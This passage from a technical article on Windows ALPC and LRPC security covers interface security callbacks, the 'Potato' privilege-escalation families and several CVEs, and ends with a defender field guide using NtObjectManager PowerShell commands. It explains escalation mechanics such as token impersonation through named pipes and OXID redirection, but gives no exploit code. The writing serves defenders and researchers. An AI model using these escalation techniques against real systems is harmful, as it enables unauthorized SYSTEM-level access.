The fourth is Tavis Ormandy's CVE-2019-1162 [@nvd-cve-2019-1162], disclosed in the August 13, 2019 Project Zero post Down the Rabbit-Hole... [@ormandy-ctf-2019]. The bug class Ormandy named is the structural exemplar of "shared system ALPC ports that ignore caller integrity." The Microsoft Text Services Framework (MSCTF) shipped a global ALPC port -- present since Windows XP in 2001 -- that any process on the desktop could open regardless of integrity level. The CTF subsystem trusted clients to identify themselves correctly in the messages they sent; the protocol had no integrity-level check or AppContainer enforcement. A low-integrity browser process could send messages that impersonated a high-integrity privileged process, and the CTF service would honour them. The fix narrowed the specific instance and left the general class of "shared ALPC ports without caller-integrity enforcement" open.

A partially-overlapping fifth example -- the same interface-callback class expressed through DCOM activation rather than direct LRPC -- is Forshaw's October 18, 2018 Project Zero post Injecting Code into Windows Protected Processes using COM [@forshaw-com-ppl-2018]. The post documented a class of Protected Process Light (PPL) bypass in which a DCOM activator marshalled an impersonated client token into a privileged COM server, and the server's interface callback trusted the marshalled identity too early in the dispatch flow. The kernel ALPC layer is doing exactly what the spec says; the bug is in the user-mode interface code that interprets the message.

Before `NtObjectManager`, a researcher looking at an LRPC service had to disassemble the service's DLL by hand, locate the calls to `RpcServerRegisterIf2`, read out the interface UUID and procedure-table pointer, parse the MIDL-generated stub manually, and assemble enough information to send a single well-formed call. After `NtObjectManager`, the same workflow was a one-line PowerShell pipeline. The methodology change cascaded into the Patch-Tuesday cycle. Differential analysis on the RPC interface inventory across a single Patch Tuesday became a research workflow that a small team could run in a single afternoon. Forshaw's December 2019 post named it explicitly: he wrote the tools because the tools were the bottleneck. The application-supplied function whose pointer is passed as the `IfCallbackFn` argument to `RpcServerRegisterIf2` [@msdocs-rpcregisterif2] or `RpcServerRegisterIf3` [@msdocs-rpcregisterif3]. The RPC runtime invokes the callback after the port-level access check passes and before the call is dispatched to the IDL-named procedure. The callback inspects the binding handle, the calling user's token, the integrity level, and any other attribute the application chooses to consult. The callback returns `RPC_S_OK` to permit the call or any other status code to reject it. A NULL callback pointer is documented as a legal value and means "permit every call that reaches the runtime." The wire format that LRPC payloads marshal through. NDR is the original 32-bit Network Data Representation transfer syntax used by DCE/RPC; NDR64 is the 64-bit extension Microsoft introduced for 64-bit Windows [@msdocs-ndr64]. Local LRPC and remote MSRPC use the same transfer syntax; the only difference is that local calls travel inside an ALPC `PORT_MESSAGE` body rather than over a TCP or named-pipe transport.

By the end of 2019, the inventory was visible, the bug class had been named, and four worked exemplars had been published. The mechanism underneath -- what an interface-registration callback actually is, why the OS cannot enforce its correctness -- is what the next section unpacks.

The deeper realisation is that none of these are kernel bugs. The kernel ALPC layer behaved correctly in every one; the bugs live in the user-mode interface-callback layer that Section 7 walks next.

7. The LRPC Overlay -- Interface Registration and the Asymmetry the OS Cannot Fix

Look at the signature of RpcServerRegisterIf2. The seventh parameter is named IfCallbackFn. Microsoft's own reference page documents that NULL is a legal value, and that NULL means "no callback" [@msdocs-rpcregisterif2]. That parameter is the asymmetry the rest of this section is about.

A canonical server-side LRPC startup sequence looks like this. The service compiles an IDL file with MIDL; MIDL emits an RPC_SERVER_INTERFACE structure that pins down the interface's UUID, version, and procedure table. The service calls RpcServerUseProtseqEp with the protocol sequence "ncalrpc", an endpoint name, and a security descriptor; that call asks the kernel, by way of the RPC runtime, to create an ALPC connection port at the requested name under \RPC Control. The service calls RpcServerRegisterIf2 or, since Windows 8, RpcServerRegisterIf3 [@msdocs-rpcregisterif3]. The newer call additionally accepts a per-interface security descriptor that the runtime enforces before consulting the callback. Both calls store the IDL spec, the interface-registration flags, and the per-interface security callback. Finally the service calls RpcServerListen, and worker threads in the RPC runtime block inside NtAlpcSendWaitReceivePort.

Per call, the dispatch sequence is: accept the inbound ALPC connection, read the NDR-encoded request from the message body, invoke the registered security callback (if any), dispatch to the MIDL-generated server stub, and marshal the reply back.

sequenceDiagram participant Client as Client stub (rpcrt4.dll, user mode) participant Kernel as Kernel ALPC dispatcher participant Worker as Server worker thread (rpcrt4.dll, user mode) participant Cb as Interface security callback (application code) participant Stub as MIDL-generated server stub (application code) Client->>Kernel: NtAlpcSendWaitReceivePort (REQUEST with NDR body) Kernel->>Worker: deliver message to blocked worker Worker->>Cb: invoke IfCallbackFn (if registered) Cb->>Worker: return RPC_S_OK or RPC_S_ACCESS_DENIED Worker->>Stub: dispatch to MIDL procedure (if callback returned OK) Stub->>Worker: result returned through NDR encoder Worker->>Kernel: NtAlpcSendWaitReceivePort (REPLY) Kernel->>Client: deliver reply

The kernel's job ends at "deliver the message to a worker thread." Everything after that is application code. The RPC runtime is a DLL that the service loads into its own address space, and the runtime's notion of authorization is whatever the callback returns. If the callback returns RPC_S_OK, the call proceeds. If the callback is NULL, the call proceeds without ever asking the application. The kernel has no notion of "this call requires SeImpersonatePrivilege" or "this call requires the caller to be in the local Administrators group", because those notions are policy choices the application makes, not properties of the IPC primitive.

The RPC service-discovery primitive at the well-known ALPC port `\RPC Control\epmapper`. An LRPC client that knows the interface UUID it wants to call -- but not which endpoint name a particular service is listening on -- calls into the endpoint mapper, hands over the UUID, and gets back the endpoint name. The mapper is itself an LRPC service; it bootstraps the rest. `rpcss` (the DCOM activator service) hosts the endpoint mapper on every Windows install. The Microsoft dialect of OSF DCE IDL used to declare RPC interfaces. An `.idl` file pins down the interface UUID, version, methods, and parameter types; the MIDL compiler produces three artifacts: a header for both client and server, a client-side stub that marshals call arguments into NDR, and a server-side stub that unmarshals NDR back into call arguments and dispatches to the application's implementation.

The interface-registration flag inventory tells the same story from a different angle. Microsoft Learn enumerates the flags on a single reference page [@msdocs-ifflags]; the four that matter for this section are quoted verbatim from that page.

Flag	What Microsoft says it does	What it closes	What it leaves open
`RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH`	"the RPC runtime invokes the registered security callback for all calls, regardless of identity, protocol sequence, or authentication level of the client"	Forces the callback to run even for unauthenticated calls	The correctness of the callback's return value
`RPC_IF_ALLOW_SECURE_ONLY`	rejects callers that did not authenticate at the runtime's minimum authentication level	Unauthenticated callers	Authenticated-but-unauthorized callers; Microsoft notes verbatim that "Using the RPC_IF_ALLOW_SECURE_ONLY flag does not imply or guarantee a high level of privilege on the part of the calling user" [@msdocs-ifflags]
`RPC_IF_SEC_NO_CACHE`	"Disables security callback caching, forcing a security callback for each RPC call on a given interface"	Stale cached approval after a token-state change	The correctness of the callback's body
`RPC_IF_ALLOW_LOCAL_ONLY`	rejects remote callers at the runtime layer	Cross-machine reachability	Local elevation primitives

The table is the argument. Every flag closes a specific known-bad pattern. No flag changes the fact that the per-interface authorization decision is application code. The runtime can be configured to force the callback to run. It cannot be configured to make the callback return the right answer.

Key idea: Port-level security is kernel infrastructure. Interface-level security is application code. The kernel can enforce the first; it cannot enforce the second. Everything in the rest of this article follows from that asymmetry.

Note: Microsoft Learn's verbatim note on IfCallbackFn reads: "Security-callback function, or NULL for no callback. Each registered interface can have a different callback function." [@msdocs-rpcregisterif2] A NULL callback means "anyone who can open the connection port can call any procedure on this interface." Many in-house services interpret the parameter as if NULL meant "default deny." It does not. NULL is a default allow, gated only by the port DACL. The CVE-2018-8440 SchRpcSetSecurity disclosure [@cert-vu906424] [@0patch-micropatch] is the canonical example of what that interpretation costs.

RpcServerRegisterIf3, introduced in Windows 8 [@msdocs-rpcregisterif3], partially mitigates the structural concern by adding a per-interface security descriptor argument the runtime checks before the callback runs. Microsoft Learn documents the order: "If both SecurityDescriptor and IfCallbackFn are specified, the security descriptor in SecurityDescriptor will be checked first and the callback in IfCallbackFn will be called after the access check against the security descriptor passes." The If3 API also bakes in an AppContainer default-deny: in the absence of an explicit security descriptor, the runtime refuses calls from AppContainer processes. These are real defences. They do not change the underlying property that the per-call authorization decision -- the one that says "this caller is allowed to invoke this procedure with these arguments" -- is delegated to an application function the kernel cannot inspect.

The kernel-vs-application boundary inside rpcrt4.dll is unusual and easy to miss. The same DLL contains both the user-mode side of the kernel ALPC syscall surface (the thin wrappers around NtAlpcSendWaitReceivePort that the runtime threads call) and the interface dispatch loop that ends in the application callback. Both halves run inside the service process; both halves are user-mode code from the kernel's point of view. The kernel does not know which RPC interface a given ALPC message is going to dispatch to. It just hands the message to a worker thread and forgets.

The endpoint-mapper bootstrap path is the other piece of the LRPC overlay worth naming. A client that knows the interface UUID it wants to talk to -- say, the AppInfo interface UUID for UAC -- but does not know which endpoint name appinfo happens to be listening on, opens the well-known ALPC port \RPC Control\epmapper, sends a query containing the UUID, and gets back the endpoint name. The endpoint mapper is itself an LRPC service running inside rpcss. It bootstraps the rest of the local-IPC fabric.

NDR and NDR64 are the wire format. NdrClientCall3 on the client side packs the call arguments into the NDR representation Microsoft documents on Learn [@msdocs-ndr64]; the bytes ride inside an ALPC PORT_MESSAGE body to the server; NdrStubCall3 on the server side unpacks them. The same NDR format that travels over a TCP socket for cross-machine MSRPC travels through an ALPC port for local LRPC. The transport is the only thing that differs.

The intuitive question -- "if the callback is the problem, why doesn't the kernel just check it?" -- bumps into two impossibility results. First, the callback is a function pointer into application code. The kernel cannot symbolically execute the function to determine whether its return value is correct; that is a halting-problem-shaped task in the general case. Second, even if the kernel could execute the function, the kernel does not know what "correct" means for an arbitrary application's authorization policy. "Correct" is the application's specification of who should be allowed to call what, and the application is the only party that has that specification. Closing the gap requires either a new ABI in which the application declares its authorization policy in a language the OS can validate, or a runtime sandbox that confines what the callback can do. Neither has been proposed as a stable Microsoft direction in any public artefact.

The structural punchline is that the RPC runtime is application code -- the callback runs in user mode in the server's address space, the runtime trusts whatever the callback returns, and the OS cannot validate the callback's body. The CVE-2019-1162 MSCTF disclosure [@ormandy-ctf-2019] and the local-COM-over-LRPC PPL-bypass class [@forshaw-com-ppl-2018] are both structural instances of this asymmetry; no kernel change could have prevented them.

That asymmetry is the engine. Almost every CVE on the Patch-Tuesday treadmill since 2018 -- the Task Scheduler ACL bug, the CTF subsystem disclosure, the PPL-COM bypasses, the Potato-family activations -- is structurally the same shape. Some are LRPC bugs. Some are not. The next section explains which is which.

8. Competing Approaches -- Named Pipes, COM, Filter Ports, and the Potato Disambiguation

Roughly half the time a defender reads "Potato" in a CVE writeup, the underlying primitive is not ALPC. The other half of the time, it is. Knowing which is which is the single most-cited reason defenders mis-classify privilege-escalation attacks. The disambiguation matters because the mitigations differ: an LRPC-on-ALPC Potato is closed (or worsened) by RPC interface-flag changes; a named-pipe Potato is closed (or worsened) by SeImpersonatePrivilege policy.

Before the Potato classification, four local-IPC primitives sit alongside LRPC-on-ALPC and deserve a brief tour.

Named pipes [@msdocs-protseq] [@msdocs-impnp] [@csandker-np] are the first-class alternative that works both locally and across machines over SMB. The Windows RPC runtime supports a ncacn_np (Network Computing Architecture, Connection-oriented, Named Pipe) protocol sequence that lets an RPC interface be reached either through \\.\pipe\name locally or through an SMB tree-connect remotely. The load-bearing security primitive for the named-pipe-Potato class is ImpersonateNamedPipeClient [@msdocs-impnp], a Win32 API that lets the server end of a named pipe impersonate the client process; the API requires the caller to hold SeImpersonatePrivilege. The privilege is granted by default to LocalSystem, LocalService, NetworkService, and to processes that hold the privilege in their token through policy. The named-pipe-Potato attack pattern is "a service running with SeImpersonatePrivilege is tricked into connecting to a named pipe the attacker controls, and the attacker calls ImpersonateNamedPipeClient to inherit the service's token."

The Windows user-right that permits a thread to impersonate another security principal -- specifically by calling APIs such as `ImpersonateNamedPipeClient` [@msdocs-impnp] or `ImpersonateLoggedOnUser`. The privilege is granted by default to `LocalSystem`, `NetworkService`, `LocalService`, and processes started by the Service Control Manager. As Clement Labro summarised the practical implication: *"if you have SeAssignPrimaryToken or SeImpersonate privilege, you are SYSTEM"* [@itm4n-printspoofer], because every interactive way to use either privilege ends in a SYSTEM token under the right circumstances. The named-pipe-Potato family exploits exactly this fact. The DCOM lookup primitive that translates an object exporter identifier (OXID) to a string binding (a protocol sequence plus an endpoint) where the corresponding COM server is listening. By default the OXID resolver runs in `rpcss` on TCP port 135. RoguePotato [@roguepotato-blog] [@roguepotato-repo] -- the post-Windows-10-1809 evolution of the Potato family -- redirects an outbound OXID-resolver query to an attacker-controlled host, which lets the attacker substitute an arbitrary endpoint and, through that, an arbitrary impersonation token.

Shared sections plus events is the lowest-level local-IPC pattern. Two processes call NtCreateSection to back the same shared memory, then synchronise with kernel events or semaphores. There is no framing, no caller-identity primitive, and no message boundary. The pattern is used in performance-sensitive contexts such as browser sandboxes and DirectX swapchain handoff; it is not a competitor with LRPC-on-ALPC for general request-reply use cases.

COM local activation [@forshaw-com-ppl-2018] [@roguepotato-blog] is not a competitor. It is a higher-level overlay. The DCOM activation service (rpcss) takes a CoCreateInstance-style activation request and, for local activations, marshals into LRPC under the hood. This is why DCOM-activation attacks are also LRPC attacks: the trigger transport is DCOM, but the impersonation primitive ends up being the LRPC RpcImpersonateClient machinery that runs inside the activated server.

Filter Communication Ports [@msdocs-minifilter-replacement] [@msdocs-fltsendmessage] are the minifilter-specific IPC channel for talking between a kernel-mode file-system filter driver and a user-mode service. A minifilter calls FltCreateCommunicationPort to set up the server side; a user-mode application calls FilterConnectCommunicationPort to attach to it; the kernel-side FltSendMessage and the user-side FilterReplyMessage carry payloads in either direction. Filter Communication Ports are a separate primitive from ALPC and live in their own namespace; the only reason to mention them in this section is that defenders sometimes conflate "any named local IPC endpoint" with ALPC, and they should not.

Now the Potato disambiguation. The Potato family is the loudest local-EoP cluster of the last decade, and the family contains two structurally different sub-families that share the surname for historical reasons.

Axis	DCOM-activation Potato	Named-pipe Potato
Triggering protocol	DCOM `CoGetInstanceFromIStorage` activation against `127.0.0.1` plus the local OXID resolver	Service connects out to a named pipe controlled by the attacker (often via UNC or by tricking a print or EFS hook)
Impersonation primitive	`RpcImpersonateClient` invoked by the activated COM server during the LRPC dispatch	`ImpersonateNamedPipeClient` invoked by the attacker on the receiving end of the pipe
Required attacker privilege	`SeImpersonatePrivilege` or `SeAssignPrimaryTokenPrivilege`	`SeImpersonatePrivilege` plus the ability to direct the service to connect to the attacker's pipe
Canonical exemplars	RoguePotato (May 2020) [@roguepotato-blog] [@roguepotato-repo], JuicyPotato, RottenPotato	PrintSpoofer (2020) [@itm4n-printspoofer], EfsPotato, PetitPotam
Post-KB5004442 status	OXID redirection to remote hosts blocked by `RPC_C_AUTHN_LEVEL_PKT_INTEGRITY` enforcement, March 2023 [@mssupport-kb5004442]	Unchanged at the OS level; mitigation is `SeImpersonatePrivilege` hygiene
Underlying IPC fabric	LRPC on ALPC	Named pipes

The HITB Amsterdam 2021 talk The Rise of Potatoes: Privilege Escalation in Windows Services by Andrea Pierini and Antonio Cocomazzi [@hitb-potatoes] is the canonical end-to-end family classification. Pierini and Cocomazzi are also the disclosers of RoguePotato [@roguepotato-blog] -- the variant that broke the post-Windows-10-1809 mitigation by redirecting the OXID resolver to an attacker-controlled host on a port other than 135. The disclosure was May 11, 2020, building on their December 6, 2019 "RogueWinRM" precursor work [@roguewinrm-blog] in which they obtained a SYSTEM identification token but not yet a usable impersonation token.

Note: Does the writeup say ImpersonateNamedPipeClient or RpcImpersonateClient? The first is a named-pipe primitive. The second is an LRPC-on-ALPC primitive. The trigger transport may be shared (DCOM activation, RPRN, EFSR), but the impersonation primitive is what tells you which IPC surface the attack actually exercises -- and which mitigation closes it.

The KB5004442 DCOM hardening rollout [@mssupport-kb5004442], which addresses CVE-2021-26414, completed phase 3 on March 14, 2023. Phase 3 enabled the hardening with no override path: DCOM activations are subject to RPC_C_AUTHN_LEVEL_PKT_INTEGRITY as a mandatory minimum, and the previously available registry overrides were removed. The OS-default configuration since March 2023 closes the JuicyPotato variant that depended on outbound DCOM to TCP/135 with downgraded authentication. RoguePotato and its descendants survived the rollout because they did not depend on the downgrade -- they depend on the OXID redirect itself, which the hardening did not block at the OS-default configuration.

Two adjacent kernel-IPC primitives deserve a footnote. The Windows Notification Facility (WNF) is a kernel-mode publish-subscribe channel for one-way state notifications [@tob-wnf]; processes register interest in named "state names" and the kernel delivers updates. Event Tracing for Windows (ETW) is the kernel's one-way event-streaming substrate [@tob-etw]; providers emit structured events, controllers configure sessions, and consumers read the events back. Yarden Shafir's Trail of Bits posts on both are the canonical practitioner references for the architectural-cousin framing. Neither WNF nor ETW competes with LRPC for the request-reply use case, because neither is request-reply. They are family of ALPC -- kernel-mediated message buses -- but they solve different problems.

The comparison matrix gives us the surface area of competing primitives. The next section asks: given this surface area, what can the OS structurally not guarantee?

9. The Limits -- Three Things ALPC and LRPC Structurally Cannot Enforce

The Vista redesign closed half the structural problem of LPC. It left three other things permanently open, and no future ALPC version can close them without a new ABI. Each of the three is a property of the trust model, not a bug in any specific server. Each has a CVE-history footprint that confirms the structural framing.

The interface-callback gate cannot be enforced by the OS. The RpcServerRegisterIf2 contract [@msdocs-rpcregisterif2] accepts a function pointer into the application's address space; the runtime trusts whatever the callback returns. The OS-side enforcement available without an ABI change is at most "invoke the callback" (which RPC_IF_SEC_NO_CACHE [@msdocs-ifflags] already enforces on every call). The OS cannot read the callback's source, cannot infer its policy, and cannot decide whether the callback's verdict matches what the application's specification says it should be. Every interface-callback EoP -- CVE-2019-1162 MSCTF [@ormandy-ctf-2019], the PPL-COM class [@forshaw-com-ppl-2018], CVE-2018-8440 [@nvd-cve-2018-8440] -- is a structural instance of this bound. Closing it requires either inventing a declarative authorization ABI the OS can validate, or sandboxing callback execution. Neither has been proposed as a stable Microsoft direction in any public artefact through 2026.

There is no transitive caller identity. ALPC's Security message attribute captures the caller's token at handshake or on demand; it does not carry a chain of trust across multiple hops. A proxy server in the middle of a call chain has to impersonate explicitly or marshal identity in band, and the receiving party at the far end has no kernel primitive that tells it "the message came from caller A, was forwarded by proxy B, and the original token is still attached." Confused-deputy attacks in the LRPC fabric are not bugs; they are an inherent property of the trust model. The DCOM-activation Potato class [@roguepotato-blog] [@roguepotato-repo] exploits exactly this property: the DCOM activator passes a token into a privileged COM server, and the server cannot reliably tell whether the token chain on the way in matches what the activator's specification said it should be.

The kernel routing path is in the trusted computing base. The ALPC dispatcher runs in Ring 0. Any bug in _ALPC_PORT object lifecycle, in _ALPC_HANDLE_DATA reference counting, in message-attribute marshalling, or in any of the dozens of structures Geoff Chappell's site [@chappell-alpc] [@chappell-alpcp] documents but Microsoft does not, is a direct kernel-elevation primitive. The CVE history demonstrates the assumption is wishful: CVE-2018-8440 [@nvd-cve-2018-8440] has a kernel reference-counting flavour in addition to the well-known interface-callback flavour, and several of the Patch-Tuesday ALPC EoP advisories of 2020-2024 carry NVD descriptions that say "improperly handles calls to Advanced Local Procedure Call (ALPC)" with no further detail because the underlying bug is a kernel bookkeeping issue Microsoft does not enumerate. The kernel routing path is settled engineering by any reasonable standard, but settled engineering is not zero-bug engineering. A new ALPC CVE in any given Patch Tuesday is consistent with the structural model.

flowchart TD A[The interface-callback gate -- the OS cannot validate the callback body] --> D[Patch-Tuesday treadmill -- interface callback CVEs, integrity-level CVEs, kernel ALPC CVEs] B[No transitive caller identity -- ALPC has no chain-of-trust primitive across hops] --> D C[The kernel routing path is in the TCB -- any _ALPC_PORT or attribute bug is a direct kernel EoP] --> D

There is a fourth observation that is not an impossibility result but is worth stating in the same breath: the practical upper bound on local authentication strength. RPC_C_AUTHN_LEVEL_PKT_INTEGRITY is the practical ceiling for local LRPC; the ncalrpc transport supports only RPC_C_AUTHN_WINNT authentication [@msdocs-protseq], and the strongest integrity check the runtime offers under that authentication service is packet integrity. The KB5004442 DCOM rollout [@mssupport-kb5004442] raised the minimum for DCOM activations to PKT_INTEGRITY in March 2023; it did not change the ceiling. The gap between upper and lower bounds is substantial and structural: raising mandatory authentication closes the unauthenticated vector and leaves the authenticated-but-unauthorized vector -- the interface-callback class -- wide open.

Key idea: The OS can require that the callback runs. It cannot require that the callback returns the right answer. The Patch-Tuesday treadmill is the consequence.

Note: CVE-2017-11783, CVE-2018-8440, and CVE-2019-1162 were the canonical exemplars of the interface-callback class. They were not unlucky outliers from an otherwise sound engineering effort. They are instances of a class the design of RpcServerRegisterIf2 cannot exclude. Almost every subsequent year of Patch Tuesdays has shipped further instances of the same class, and 2026's count is on track to be no smaller than 2018's.

Closing the interface-callback gap would look like one of two architectural shifts. Either Microsoft would introduce a declarative authorization language for RPC interfaces -- a manifest the application ships alongside the IDL that the runtime can parse and the OS can validate -- and then forbid the imperative callback. Or the runtime would execute the callback inside a sandbox that constrains what the callback can do (no arbitrary memory reads of the service's address space, no ability to issue privileged syscalls, no ability to side-channel through global state). Neither is on a publicly-named Microsoft roadmap; the closest public artefact is Forshaw's ongoing tooling work on parsing the interface inventory [@forshaw-saatools] [@forshaw-rpc-2019] [@forshaw-poc2023], which equips defenders to audit the callbacks they have rather than to replace the model.

The limits are honest. They are also not the whole story. Research has not stopped trying to close the gap, and the next section names what is still active.

The Patch-Tuesday treadmill is the expected steady state, not a transitional embarrassment. Closing the class requires reworking the contract -- a different ABI, or a sandboxed execution model -- and no public Microsoft roadmap commits to either.

10. Open Problems and a Practical Field Guide (2024-2026)

The 2024-2026 conference cycle is still arguing about how to make the interface-callback class scalable to defend. This section enumerates the open problems and then closes with the practical workflow a defender or an in-house RPC author can run today. The practical recipe is in part an answer to the open problems.

Open problem 1: public RPC fuzzing at Microsoft-internal scale. The public ceiling is RPCForge [@rpcforge] for NDR-aware fuzzing, Forshaw's NtObjectManager for interface inventory and client generation [@forshaw-saatools] [@forshaw-rpc-2019], and the November 2023 PoC talk Building More Windows RPC Tooling for Security Research [@forshaw-poc2023] for the latest research-tooling continuation. Microsoft's internal pipeline is not public; whether a coverage-guided NDR64 fuzzer can become a small-team repeatable Patch-Tuesday tool is open.

Open problem 2: auditing the interface-registration model for structural permissiveness. A defender using Get-RpcServer can enumerate every LRPC interface on a Windows install and dump each interface's procedures and security descriptor. The defender cannot tell, without per-interface manual review, whether a registered callback is correct. Heuristic detection of NULL IfCallbackFn is mechanical; detection of semantically permissive callbacks -- callbacks whose body trusts a field the caller controls -- is open and probably AI-shaped.

Open problem 3: RPC_IF_SEC_NO_CACHE adoption and cost. No public catalogue of which Microsoft services use the flag exists. No per-call cost benchmark is published. Defender heuristics that recommend the flag for high-risk interfaces cannot quantify the performance trade-off they are recommending.

Open problem 4: the local-COM-over-LRPC bypass class. Forshaw's 2018 PPL-COM post [@forshaw-com-ppl-2018] articulated a class of attack against Protected Process Light that continues to surface in CVE reports. The structural class is unaddressed at the OS level.

Open problem 5: ALPC as covert channel. The CVE-2019-1162 MSCTF fix [@ormandy-ctf-2019] narrowed the MSCTF subsystem's exposure. The general class of "shared system ALPC ports that ignore caller integrity" is structural; identifying others requires the kind of systematic audit Open Problem 2 names.

Open problem 6: defender SOC integration of the Microsoft-Windows-Kernel-ALPC ETW provider [@msdocs-etwsys]. The provider is high-volume; production SOC pipelines rarely subscribe to it because the event rate overwhelms commodity collection. Per-call ALPC visibility today is concentrated inside EDR vendors that gate it behind antimalware-PPL processes.

Open problem 7: AppContainer-aware RPC capability checking. RpcServerRegisterIf3 [@msdocs-rpcregisterif3] introduces an AppContainer default-deny, but there is no standard pattern for in-house service authors who want to express "this procedure requires capability X." Service authors roll their own; some get it right.

Tool	Purpose	Author / Org	Reference
`NtObjectManager` / `NtCoreLib` (formerly `NtApiDotNet`)	LRPC interface enumeration, decompilation, and client generation from PowerShell or .NET	James Forshaw, Project Zero	[@forshaw-saatools] [@forshaw-rpc-2019]
RpcView	Qt5/C++ GUI for browsing RPC servers and decompiled interface metadata across Windows versions	silverf0x	[@rpcview-repo]
RPC Investigator	.NET Forms UI built on `NtApiDotNet` for enumeration, client workbench, and an "RPC Sniffer" ETW-backed live view	Trail of Bits, January 2023	[@tob-rpcinv-blog] [@rpcinv-repo]
RPCMon	ETW-based GUI for scanning RPC communication, built like Sysinternals Procmon, depending on Forshaw's library	CyberArk Labs	[@rpcmon-repo]
RPCForge	NDR-aware local Python fuzzer for ALPC-exposed RPC interfaces	Clement Rouault and Thomas Imbert, Sogeti ESEC	[@rpcforge]
Forshaw NDR64 / RPC research pipeline (2023)	Continued research tooling and conference materials	James Forshaw	[@forshaw-poc2023]

The practical field guide. Eight numbered actions for the defender or in-house RPC service author. Each cites a verified source the reader can re-read in full.

Note: 1. Enumerate registered LRPC interfaces with Install-Module NtObjectManager; Get-RpcServer ... | Where-Object { $_.Endpoints.ProtocolSequence -eq 'ncalrpc' } [@forshaw-saatools] [@forshaw-rpc-2019]. Snapshot before and after Patch Tuesday and diff on (UUID, procedure list, security descriptor). 2. Enumerate live ALPC server ports with Get-NtAlpcServer. The cmdlet returns the named connection ports; the unnamed per-connection ports are not enumerable by design (see Section 4) [@forshaw-saatools]. 3. Reach a local RPC server from PowerShell with Forshaw's New-RpcClient cmdlet, which generates a [NtCoreLib.Win32.Rpc.Client]-derived class from the parsed server metadata [@forshaw-rpc-2019]. This is the primitive that lets a Patch-Tuesday differential become an actual interaction. 4. Audit your own RPC service for the canonical mistake: any RpcServerRegisterIf2 or RpcServerRegisterIf3 call with a NULL IfCallbackFn argument is "anyone who can open the port can call any procedure on the interface" [@msdocs-rpcregisterif2] [@msdocs-rpcregisterif3]. Treat NULL callbacks as a finding, not a default. 5. Harden an exposed LRPC interface with the flag combination RPC_IF_ALLOW_SECURE_ONLY | RPC_IF_SEC_NO_CACHE plus an explicit callback that validates I_RpcBindingInqLocalClientPID and the caller's token integrity level [@msdocs-ifflags]. The Microsoft Learn note that "Using the RPC_IF_ALLOW_SECURE_ONLY flag does not imply or guarantee a high level of privilege on the part of the calling user" [@msdocs-ifflags] makes the explicit callback non-optional. 6. For DCOM-activated services, accept the KB5004442 default (RPC_C_AUTHN_LEVEL_PKT_INTEGRITY minimum) and do not invoke registry overrides. The override path was removed in the March 14, 2023 phase 3 rollout [@mssupport-kb5004442]. 7. For runtime visibility, enable the Microsoft-Windows-RPC ETW provider via RPCMon [@rpcmon-repo] or RPC Investigator's RPC Sniffer [@tob-rpcinv-blog] [@rpcinv-repo]; correlate per-process per-procedure call rates against the service inventory from step 1. 8. For per-message kernel-level visibility, enable the Microsoft-Windows-Kernel-ALPC system provider from an EVENT_TRACE_SYSTEM_LOGGER_MODE session [@msdocs-etwsys]. Budget for the documented high-volume warning; consider an EDR vendor that runs the provider already if you do not want to host the collection yourself.

{` // Real shell pipeline that produces the inputs: // Get-RpcServer | Export-Clixml -Path C:\\Snaps\\rpc-pre-patch.xml // // Get-RpcServer | Export-Clixml -Path C:\\Snaps\\rpc-post-patch.xml // Compare-Object (Import-Clixml C:\\Snaps\\rpc-pre-patch.xml) ... // The diff logic below is what Compare-Object is doing under the hood, in plain JS.

const pre = new Map([ ['201ef99a-7fa0-444c-9399-19ba84f12a1a', ['Activate','Cancel','Continue','GetElevationType']], ['86d35949-83c9-4044-b424-db363231fd0c', ['SchRpcRegisterTask','SchRpcRetrieveTask','SchRpcSetSecurity']], ['e1af8308-5d1f-11c9-91a4-08002b14a0fa', ['ept_lookup','ept_map','ept_insert']], ]);

const post = new Map([ ['201ef99a-7fa0-444c-9399-19ba84f12a1a', ['Activate','Cancel','Continue','GetElevationType','RequestElevation2']], ['86d35949-83c9-4044-b424-db363231fd0c', ['SchRpcRegisterTask','SchRpcRetrieveTask','SchRpcSetSecurityV2']], ['e1af8308-5d1f-11c9-91a4-08002b14a0fa', ['ept_lookup','ept_map','ept_insert']], ]);

RPCMon ships a hard-coded RPC interface dictionary named RPC_UUID_Map_Windows10_1909_18363.1977.rpcdb.json [@rpcmon-repo] -- a snapshot of Windows 10 1909 build 18363.1977 -- as the baseline against which it labels traced interfaces. The choice to bake in a build-specific baseline is evidence of how often the inventory needs refreshing: a defender running RPCMon on Windows 11 23H2 in 2026 is looking up call sites against a six-year-old dictionary. The accompanying tooling Forshaw built makes the regeneration mechanical in principle; the burden of running the regeneration is what stays on the defender.

Install Forshaw's module and dump every local-only RPC interface on the current Windows install, one row per interface, sorted by procedure count:

Install-Module NtObjectManager -Scope CurrentUser
Get-RpcServer -DbgHelpPath "$env:ProgramFiles\Debugging Tools for Windows\dbghelp.dll" |
  Where-Object { $_.Endpoints.ProtocolSequence -eq 'ncalrpc' } |
  Sort-Object { $_.Procedures.Count } -Descending |
  Select-Object Name, InterfaceId, @{N='Procs';E={$_.Procedures.Count}} |
  Format-Table -AutoSize

Expect dozens of named interfaces on a clean Windows 11 install. Save the output, install Patch Tuesday, run it again, and Compare-Object the two snapshots. That diff is the canonical research workflow that the December 2019 Project Zero post [@forshaw-rpc-2019] introduced.

The single most effective change an in-house LRPC author can make tomorrow morning is to move from `RpcServerRegisterIf2` with `IfCallbackFn = NULL` to `RpcServerRegisterIf3` with both an explicit per-interface security descriptor and a callback that explicitly validates caller identity. The migration is mechanical -- the function signatures are upward-compatible -- and the runtime check the `If3` API adds gives the application a per-call enforcement gate that does not depend on the application's callback being correct. Pair it with `RPC_IF_SEC_NO_CACHE` if the callback inspects token state that can change during a session (group membership, integrity level, AppContainer SID).

The practical recipe answers the everyday question: what do I do tomorrow morning? The misconceptions section answers a harder question: what should I stop believing?

11. FAQ -- Six Misconceptions, Removed

Half the operational confusion about ALPC and LRPC comes from premises that sound plausible and are wrong. This section names six of them. Each answer starts with the wrong answer, explicitly, before correcting it.

